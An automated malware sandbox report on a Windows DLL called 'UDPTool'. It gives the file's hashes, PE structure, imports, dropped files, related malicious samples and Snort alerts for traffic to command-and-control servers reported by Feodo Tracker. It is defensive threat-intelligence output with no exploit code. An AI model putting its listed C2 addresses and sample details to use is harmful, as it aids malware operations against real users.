	RmgO44zN8B.xlsx	Get hash	malicious	Browse	41.63.96.0
	o7GqaY5L5D.xlsx	Get hash	malicious	Browse	95.140.230.192
	NewPurchaseOrder.exe	Get hash	malicious	Browse	95.140.236.0
	MSC INVOICE.xlsx	Get hash	malicious	Browse	178.79.225.128
	49HhrNxVP4.dll	Get hash	malicious	Browse	95.140.236.128
	mxXf3QkvqB.dll	Get hash	malicious	Browse	41.63.96.0
	ZoRy73dQrV.dll	Get hash	malicious	Browse	178.79.242.128
	DpWifKzilH.dll	Get hash	malicious	Browse	178.79.242.128
	9SgVLjovpq.dll	Get hash	malicious	Browse	95.140.236.128
	SecuriteInfo.com.Trojan.Skarlet.3.Gen.16172.xlsm	Get hash	malicious	Browse	95.140.230.192
	SecuriteInfo.com.Trojan.Agent.FRJZ.17141.xlsm	Get hash	malicious	Browse	95.140.236.128

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-CHOOPAUS	vHwdqVl8yP.dll	Get hash	malicious	Browse	66.42.57.149
	wg1bXKYOOs.dll	Get hash	malicious	Browse	66.42.57.149
	SecuriteInfo.com.Trojan.Agent.FRJZ.37.xlsm	Get hash	malicious	Browse	66.42.57.149
	qJQ5zHpsbm.dll	Get hash	malicious	Browse	66.42.57.149
	EtUNsUHRzq.dll	Get hash	malicious	Browse	66.42.57.149
	PyqpE3VUI3.dll	Get hash	malicious	Browse	66.42.57.149
	SecuriteInfo.com.Trojan.Agent.FRJZ.31437.xlsm	Get hash	malicious	Browse	66.42.57.149
	P6h9ZprN2X.dll	Get hash	malicious	Browse	66.42.57.149
	SecuriteInfo.com.Trojan.Agent.FRJZ.15200.xlsm	Get hash	malicious	Browse	66.42.57.149
	P6h9ZprN2X.dll	Get hash	malicious	Browse	66.42.57.149
	TkXWcfci7G.dll	Get hash	malicious	Browse	66.42.57.149
	SecuriteInfo.com.Trojan.Agent.FRJZ.29393.xlsm	Get hash	malicious	Browse	66.42.57.149
	SecuriteInfo.com.Trojan.Agent.FRJZ.18721.xlsm	Get hash	malicious	Browse	66.42.57.149
	SecuriteInfo.com.Trojan.Agent.FRJZ.3593.xlsm	Get hash	malicious	Browse	66.42.57.149
	CaaBlZ3pOc.exe	Get hash	malicious	Browse	149.28.78.238
	SecuriteInfo.com.Trojan.Agent.FRJZ.5957.xlsm	Get hash	malicious	Browse	66.42.57.149
	GxRg3MtYpO.dll	Get hash	malicious	Browse	66.42.57.149
	SecuriteInfo.com.Trojan.Agent.FRJZ.4911.xlsm	Get hash	malicious	Browse	66.42.57.149
	SecuriteInfo.com.Trojan.Agent.FRJZ.9674.xlsm	Get hash	malicious	Browse	66.42.57.149
	SecuriteInfo.com.Trojan.Agent.FRJZ.20696.xlsm	Get hash	malicious	Browse	66.42.57.149
DIGITALOCEAN-ASNUS	vHwdqVl8yP.dll	Get hash	malicious	Browse	128.199.192.135
	wg1bXKYOOs.dll	Get hash	malicious	Browse	128.199.192.135
	SecuriteInfo.com.Trojan.Agent.FRJZ.37.xlsm	Get hash	malicious	Browse	128.199.192.135
	qJQ5zHpsbm.dll	Get hash	malicious	Browse	128.199.192.135
	EtUNsUHRzq.dll	Get hash	malicious	Browse	128.199.192.135
	tijXCZsbGe.exe	Get hash	malicious	Browse	188.166.28.199
	PyqpE3VUI3.dll	Get hash	malicious	Browse	128.199.192.135
	SecuriteInfo.com.Trojan.Agent.FRJZ.31437.xlsm	Get hash	malicious	Browse	128.199.192.135
	P6h9ZprN2X.dll	Get hash	malicious	Browse	128.199.192.135
	SecuriteInfo.com.Trojan.Agent.FRJZ.15200.xlsm	Get hash	malicious	Browse	128.199.192.135
	P6h9ZprN2X.dll	Get hash	malicious	Browse	128.199.192.135
	TkXWcfci7G.dll	Get hash	malicious	Browse	128.199.192.135
	SecuriteInfo.com.Trojan.Agent.FRJZ.29393.xlsm	Get hash	malicious	Browse	128.199.192.135
	SecuriteInfo.com.Trojan.Agent.FRJZ.18721.xlsm	Get hash	malicious	Browse	128.199.192.135
	JBtjAS1TGq.exe	Get hash	malicious	Browse	188.166.28.199
	SecuriteInfo.com.Trojan.Agent.FRJZ.3593.xlsm	Get hash	malicious	Browse	128.199.192.135
	SecuriteInfo.com.Trojan.Agent.FRJZ.5957.xlsm	Get hash	malicious	Browse	128.199.192.135
	GxRg3MtYpO.dll	Get hash	malicious	Browse	128.199.192.135
	eIxMVDoQF3.exe	Get hash	malicious	Browse	188.166.28.199
	SecuriteInfo.com.Trojan.Agent.FRJZ.4911.xlsm	Get hash	malicious	Browse	128.199.192.135

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.3593198815979092
Encrypted:	false
SSDEEP:	12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
MD5:	BF1DC7D5D8DAD7478F426DF8B3F8BAA6
SHA1:	C6B0BDE788F553F865D65F773D8F6A3546887E42
SHA-256:	BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
SHA-512:	00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
Malicious:	false
Preview:	.......................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	MPEG-4 LOAS
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.2494702542656237
Encrypted:	false
SSDEEP:	1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4P:BJiRdwfu2SRU4P
MD5:	A3FA8500BDB67E46A9338612845024FC
SHA1:	3A99BB312877830A9594D9DCE2AFC8C03F392F0F
SHA-256:	85A48C90B97C5AC71284AE7855676A05D828CE50CD391C1E6628725675EBB415
SHA-512:	E695F42F61A4C8173944CA6767DC9F73281FF8B4D9E867E6BCF6F48FA00E8D97719F50A54F66C2443020A5546D1ACE4A8B2A7D8399FB14EF28A9984EED21C70D
Malicious:	false
Preview:	V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0xf80f3fb9, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	786432
Entropy (8bit):	0.25069434296156595
Encrypted:	false
SSDEEP:	384:mH/+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:mHUSB2nSB2RSjlK/+mLesOj1J2
MD5:	501852577D4C609CC733CCC0B8ECE958
SHA1:	CF7A843544A8AF61B9CB282000211C7E0D5DA22A
SHA-256:	B3043C4785265F8ED659050B55E86420B6786D0D218B0E8FC4F627ACC9E5C70C
SHA-512:	CBDD8C98813044387F7EC3BEBACAD60DA6120514910CDC2B23FC641C716FB395817105E34939E7954E7A3829E991B84C2A533F15407140ADDD38859D4A86F252
Malicious:	false
Preview:	..?.... ................e.f.3...w........................).....!)...zc..&...z..h.(.....!)...zc...)..............3...w...........................................................................................................B...........@...................................................................................................... .......................................................................................................................................................................................................................................................!)...zc.................].5.!)...zc.........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07678133055253546
Encrypted:	false
SSDEEP:	3:qR7vyDAWtjtlt9FXTItill3Vkttlmlnl:qRrysKh33
MD5:	3C718CC240DCEEDF8BA59F9AA557C597
SHA1:	9341B851572E15116C936EADBE41AF6639B32AC2
SHA-256:	B660E6E298E466AA5BB2A99471E12220193D18B68EC883F3D7C420E1A9B739E7
SHA-512:	30C63365B2CBAD08C48EAC73192479948D127CAB5AE96CA8CE1CB4C5257575C174C8FBE9C6A675B868ABE6775C7BAA76DE47A3705F4BD11975C36AC709A09FC9
Malicious:	false
Preview:	..6#.....................................3...w...&...z..!)...zc.........!)...zc.!)...zc.e.., )...z.}................].5.!)...zc.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Microsoft Cabinet archive data, 61414 bytes, 1 file
Category:	dropped
Size (bytes):	61414
Entropy (8bit):	7.995245868798237
Encrypted:	true
SSDEEP:	1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
MD5:	ACAEDA60C79C6BCAC925EEB3653F45E0
SHA1:	2AAAE490BCDACCC6172240FF1697753B37AC5578
SHA-256:	6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
SHA-512:	FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
Malicious:	false
Preview:	MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF....f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.a..x..O..V.t..Y1!.T..`U...-...< _@...\|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.101256677853478
Encrypted:	false
SSDEEP:	6:kK/LKk8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:nG9kPlE99SNxAhUeYlUSA/t
MD5:	1CA7AEE1BEBAA4827B91C7C5A352CA4D
SHA1:	B464712365B6C9313A8A69AEB612287738C764A9
SHA-256:	D85A58A7E2D34A2E618E12AD3B54FA1AC82D570A48A77211E45E105B202B2509
SHA-512:	2012737BC1B8FEC2F54AB636CA25F0A7462FFAFF4636440A077F1615FC9DB4D7702A983D3DA022112DA2BE75CDE08A612F422697752358CE5BC4862405DA4006
Malicious:	false
Preview:	p...... ..........].u...(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.088004950406934
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 95.65% Win32 EXE PECompact compressed (generic) (41571/9) 3.97% Generic Win/DOS Executable (2004/3) 0.19% DOS Executable Generic (2002/1) 0.19% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	CSxylfUJcL.dll
File size:	417792
MD5:	fa7ab814336d3ee4312c262457e01f01
SHA1:	73e1844abe6d99a57345464f418279d596985202
SHA256:	c89c49c3e8e37835ab53bfd9ff9ab97c80e037f0fdfe7e8df6a7d3d86fa62782
SHA512:	088fabcbc8481b5967c5bcbdf002f1158856fe33119e5a6aa333c349ad2ffef5a60bc56760d2affaa68aff07a004fd5ce82eeeacee01e84fb1dc0ce66799249b
SSDEEP:	6144:o1ju3jPam65ucnNgDoDUhuGGwKveuD4VKYjHyCAJOhrmBlDxqms9ujAJKedmL/:yMjcuDaUImtStJorohvsMjmKe
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z'...F...F...F...I...F...I...F...F...D..9....F..9....F..9....F..9....F..9....F..9....F..Rich.F..................PE..L...k+.a...

File Icon


Icon Hash:	71b018ccc6577131

Static PE Info

General
Entrypoint:	0x10017b85
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x61E02B6B [Thu Jan 13 13:38:51 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	90add561a8bf6976696c056c199a41b8

Entrypoint Preview

Instruction
cmp dword ptr [esp+08h], 01h
jne 00007F5138716D87h
call 00007F513871EB08h
push dword ptr [esp+04h]
mov ecx, dword ptr [esp+10h]
mov edx, dword ptr [esp+0Ch]
call 00007F5138716C72h
pop ecx
retn 000Ch
push 00000000h
push dword ptr [esp+14h]
push dword ptr [esp+14h]
push dword ptr [esp+14h]
push dword ptr [esp+14h]
call 00007F513871EB70h
add esp, 14h
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [10057A08h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [10057A08h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], esp
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [10057A08h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax

Rich Headers

Programming Language:

[RES] VS2005 build 50727
[ C ] VS2005 build 50727
[EXP] VS2005 build 50727
[C++] VS2005 build 50727
[ASM] VS2005 build 50727
[LNK] VS2005 build 50727

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x313c0	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2fdcc	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5d000	0x3664	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x61000	0x3df4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2cd60	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x29000	0x440	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x2fd44	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x27f5e	0x28000	False	0.514996337891	data	6.66251942868	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x29000	0x8410	0x9000	False	0.308865017361	data	4.83069227563	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x32000	0x2a9a0	0x27000	False	0.963572966747	data	7.93281036967	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x5d000	0x3664	0x4000	False	0.274780273438	data	4.49622273105	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x61000	0x8284	0x9000	False	0.33251953125	data	3.82081999119	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x5db08	0x134	data	Chinese	China
RT_CURSOR	0x5dc3c	0xb4	data	Chinese	China
RT_CURSOR	0x5dcf0	0x134	AmigaOS bitmap font	Chinese	China
RT_CURSOR	0x5de24	0x134	data	Chinese	China
RT_CURSOR	0x5df58	0x134	data	Chinese	China
RT_CURSOR	0x5e08c	0x134	data	Chinese	China
RT_CURSOR	0x5e1c0	0x134	data	Chinese	China
RT_CURSOR	0x5e2f4	0x134	data	Chinese	China
RT_CURSOR	0x5e428	0x134	data	Chinese	China
RT_CURSOR	0x5e55c	0x134	data	Chinese	China
RT_CURSOR	0x5e690	0x134	data	Chinese	China
RT_CURSOR	0x5e7c4	0x134	data	Chinese	China
RT_CURSOR	0x5e8f8	0x134	AmigaOS bitmap font	Chinese	China
RT_CURSOR	0x5ea2c	0x134	data	Chinese	China
RT_CURSOR	0x5eb60	0x134	data	Chinese	China
RT_CURSOR	0x5ec94	0x134	data	Chinese	China
RT_BITMAP	0x5edc8	0xb8	data	Chinese	China
RT_BITMAP	0x5ee80	0x144	data	Chinese	China
RT_ICON	0x5efc4	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676	Chinese	China
RT_ICON	0x5f2ac	0x128	GLS_BINARY_LSB_FIRST	Chinese	China
RT_DIALOG	0x5f3d4	0x33c	data	Chinese	China
RT_DIALOG	0x5f710	0xe2	data	Chinese	China
RT_DIALOG	0x5f7f4	0x34	data	Chinese	China
RT_STRING	0x5f828	0x54	data	Chinese	China
RT_STRING	0x5f87c	0x2c	data	Chinese	China
RT_STRING	0x5f8a8	0x82	data	Chinese	China
RT_STRING	0x5f92c	0x1d0	data	Chinese	China
RT_STRING	0x5fafc	0x164	data	Chinese	China
RT_STRING	0x5fc60	0x132	data	Chinese	China
RT_STRING	0x5fd94	0x50	data	Chinese	China
RT_STRING	0x5fde4	0x40	data	Chinese	China
RT_STRING	0x5fe24	0x6a	data	Chinese	China
RT_STRING	0x5fe90	0x1d6	data	Chinese	China
RT_STRING	0x60068	0x110	data	Chinese	China
RT_STRING	0x60178	0x24	data	Chinese	China
RT_STRING	0x6019c	0x30	data	Chinese	China
RT_GROUP_CURSOR	0x601cc	0x22	Lotus unknown worksheet or configuration, revision 0x2	Chinese	China
RT_GROUP_CURSOR	0x601f0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x60204	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x60218	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x6022c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x60240	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x60254	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x60268	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x6027c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x60290	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x602a4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x602b8	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x602cc	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x602e0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_CURSOR	0x602f4	0x14	Lotus unknown worksheet or configuration, revision 0x1	Chinese	China
RT_GROUP_ICON	0x60308	0x22	data	Chinese	China
RT_VERSION	0x6032c	0x2e0	data	Chinese	China
RT_MANIFEST	0x6060c	0x56	ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	CreateFileA, GetCPInfo, GetOEMCP, RtlUnwind, HeapReAlloc, GetCommandLineA, RaiseException, ExitProcess, HeapSize, HeapDestroy, HeapCreate, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetACP, LCMapStringW, GetStdHandle, SetHandleCount, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetConsoleCP, GetConsoleMode, GetStringTypeA, GetStringTypeW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, GetCurrentProcess, GetThreadLocale, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, GlobalFlags, WritePrivateProfileStringA, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, GlobalHandle, GlobalReAlloc, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, LocalAlloc, InterlockedIncrement, GlobalGetAtomNameA, GlobalFindAtomA, lstrcmpW, GetVersionExA, InterlockedDecrement, FreeResource, GetCurrentProcessId, GlobalAddAtomA, GetCurrentThread, GetCurrentThreadId, ConvertDefaultLocale, GetModuleFileNameA, EnumResourceLanguagesA, GetLocaleInfoA, lstrcmpA, GlobalDeleteAtom, GetModuleHandleA, GlobalFree, GlobalAlloc, GlobalLock, GlobalUnlock, FormatMessageA, LocalFree, FindResourceA, LoadResource, LockResource, SizeofResource, MulDiv, CreateThread, CloseHandle, HeapFree, GetNativeSystemInfo, GetProcessHeap, HeapAlloc, FreeLibrary, GetProcAddress, LoadLibraryA, IsBadReadPtr, VirtualProtect, SetLastError, VirtualAlloc, VirtualFree, VirtualQuery, Sleep, GetLastError, lstrlenA, WideCharToMultiByte, CompareStringA, MultiByteToWideChar, GetVersion, LCMapStringA, InterlockedExchange
USER32.dll	LoadCursorA, GetSysColorBrush, EndPaint, BeginPaint, ReleaseDC, GetDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, SetWindowTextA, IsDialogMessageA, SetDlgItemTextA, GetDlgItemTextA, RegisterWindowMessageA, SendDlgItemMessageA, WinHelpA, GetCapture, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SetFocus, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, GetTopWindow, GetMessageTime, MapWindowPoints, SetForegroundWindow, UpdateWindow, GetMenu, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, GetSysColor, CopyRect, PtInRect, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowLongA, SetWindowPos, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, GetWindow, UnhookWindowsHookEx, GetDesktopWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, IsWindow, GetDlgItem, GetNextDlgTabItem, EndDialog, GetWindowThreadProcessId, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, MessageBoxA, SetCursor, SetWindowsHookExA, CallNextHookEx, GetMessageA, TranslateMessage, DispatchMessageA, GetActiveWindow, IsWindowVisible, GetKeyState, PeekMessageA, GetCursorPos, ValidateRect, SetMenuItemBitmaps, DestroyMenu, UnregisterClassA, GetMessagePos, GetMenuCheckMarkDimensions, LoadBitmapA, GetFocus, GetParent, ModifyMenuA, EnableMenuItem, CheckMenuItem, PostQuitMessage, GetMenuState, GetMenuItemID, GetMenuItemCount, GetSubMenu, SetTimer, KillTimer, IsIconic, GetSystemMetrics, GetClientRect, DrawIcon, SendMessageA, ShowWindow, EnableWindow, LoadIconA, PostMessageA, AdjustWindowRectEx
GDI32.dll	SetWindowExtEx, ScaleWindowExtEx, DeleteDC, GetStockObject, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, ExtTextOutA, TextOutA, RectVisible, PtVisible, GetDeviceCaps, DeleteObject, SetMapMode, RestoreDC, SaveDC, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateBitmap
WINSPOOL.DRV	DocumentPropertiesA, ClosePrinter, OpenPrinterA
ADVAPI32.dll	RegSetValueExA, RegCreateKeyExA, RegQueryValueA, RegEnumKeyA, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA, RegOpenKeyA, RegCloseKey
SHLWAPI.dll	PathFindExtensionA
OLEAUT32.dll	VariantClear, VariantChangeType, VariantInit
WS2_32.dll	sendto, recvfrom, WSAStartup, inet_addr, htons, socket, bind, setsockopt, WSACleanup, closesocket, htonl

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x10008af0

Version Infos

Description	Data
LegalCopyright	(C) 2014
InternalName	UDPTool
FileVersion	1, 0, 0, 1
CompanyName
LegalTrademarks
ProductName	UDPTool
ProductVersion	1, 0, 0, 1
FileDescription	UDPTool Microsoft
OriginalFilename	UDPTool.EXE
Translation	0x0804 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/14/22-10:37:48.669419	TCP	2404332	ET CNC Feodo Tracker Reported CnC Server TCP group 17	49766	80	192.168.2.6	45.138.98.34
01/14/22-10:37:49.746848	TCP	2404338	ET CNC Feodo Tracker Reported CnC Server TCP group 20	49770	8080	192.168.2.6	69.16.218.101

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2022 10:37:48.669419050 CET	49766	80	192.168.2.6	45.138.98.34
Jan 14, 2022 10:37:48.686331987 CET	80	49766	45.138.98.34	192.168.2.6
Jan 14, 2022 10:37:49.190272093 CET	49766	80	192.168.2.6	45.138.98.34
Jan 14, 2022 10:37:49.207226038 CET	80	49766	45.138.98.34	192.168.2.6
Jan 14, 2022 10:37:49.721563101 CET	49766	80	192.168.2.6	45.138.98.34
Jan 14, 2022 10:37:49.738476038 CET	80	49766	45.138.98.34	192.168.2.6
Jan 14, 2022 10:37:49.746848106 CET	49770	8080	192.168.2.6	69.16.218.101
Jan 14, 2022 10:37:49.875647068 CET	8080	49770	69.16.218.101	192.168.2.6
Jan 14, 2022 10:37:49.877245903 CET	49770	8080	192.168.2.6	69.16.218.101
Jan 14, 2022 10:37:49.920694113 CET	49770	8080	192.168.2.6	69.16.218.101
Jan 14, 2022 10:37:50.049519062 CET	8080	49770	69.16.218.101	192.168.2.6
Jan 14, 2022 10:37:50.062572956 CET	8080	49770	69.16.218.101	192.168.2.6
